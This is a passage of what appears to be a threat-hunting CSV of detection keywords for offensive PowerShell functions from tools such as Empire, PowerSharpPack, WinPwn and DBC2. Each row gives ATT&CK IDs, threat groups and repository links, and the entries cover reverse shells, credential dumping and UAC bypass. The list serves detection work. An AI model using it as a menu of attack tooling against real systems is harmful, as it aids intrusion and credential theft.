Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-SDPropagator*","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. 
and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","1","57","10","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z"
+"*Invoke-Seatbelt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Seatbelt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SendMail -Targets*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*Invoke-SendReverseShell*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*Invoke-SensitiveHiveFileAccessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-SensitiveHiveShadowCopyCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ServiceAbuse*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Invoke-ServiceAbuse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ServiceAbuse*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-Service-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 
- T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for 
Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-SessionGopher*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-SessionGopher*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-ShadowSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*invoke-sharefinder *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*invokesharefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-ShareFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-ShareFinder*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. 
Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Invoke-ShareFinder*","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Invoke-ShareFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-SharpAllowedToAct*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpBlock*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpBypassUAC*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpChromium*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpClipboard*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpCloud*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpCloud*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-Sharpcradle*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpDPAPI*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharPersist*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpGPO*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpGPOAbuse*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpGPO-RemoteAccessPolicies*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpHandler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpHide*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 
- T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*InvokeSharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*Invoke-Sharphound*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-Sharphound2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Sharphound3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpHound4*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Sharphound4*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpImpersonation*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpImpersonation*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpImpersonationNoSpace*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
